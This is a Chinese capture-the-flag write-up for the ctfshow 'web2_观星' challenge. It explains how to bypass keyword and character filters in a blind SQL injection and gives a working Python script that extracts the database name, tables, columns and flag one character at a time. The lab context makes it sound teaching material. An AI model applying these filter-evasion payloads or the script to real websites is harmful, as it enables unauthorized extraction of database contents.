ctfshow-WEB AK赛-web2_观星

第一眼这个题目，跟前几天做过的很像

点一个文章发现地址栏上有个id参数，应该是注入了

令id=1’返回enheng?发现’被过滤了，fuzz测试过滤了空格、’、"、=、like、ascii、union、order by、|、sleep、 。

常用的盲注payload为payload=1^if(ascii(substr('flag',1,1))=104,1,0)

过滤了空格可以用括号代替；

过滤了单引号可以用16进制代替；

过滤了逗号，对于substr可以用 substr(database() from 1 for 1 )代替substr(database(),1,1)，if中有逗号可以用case when代替if；

过滤了 ascii可以用ord代替；

过滤了等号和like可以用regexp代替。

这样上面的常规语句就可以转化为
id=1^case(ord(substr(database()from(1)for(1))))when(102)then(2)else(3)end

盲注脚本(来自羽师傅)：

import requests
url="http://733ff90c-f8ab-4a3b-af6e-3ebb2f4a7b12.chall.ctf.show/index.php?id=1^"
flag=""
for i in range(1,50):
    print("i="+str(i))
    for j in range(38,126):
        #u="case(ord(substr(database()from({0})for(1))))when({1})then(2)else(3)end".format(i,j)  #库名  web1
        #u="case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #表名 flag、page、user
        #u="case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #列名 FLAG_COLUMN、flag
        u="case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #flag字段
        u=url+u
        r=requests.get(u)
        t=r.text
        if("I asked nothing" in t):
            flag+=chr(j)
            print(flag)
            break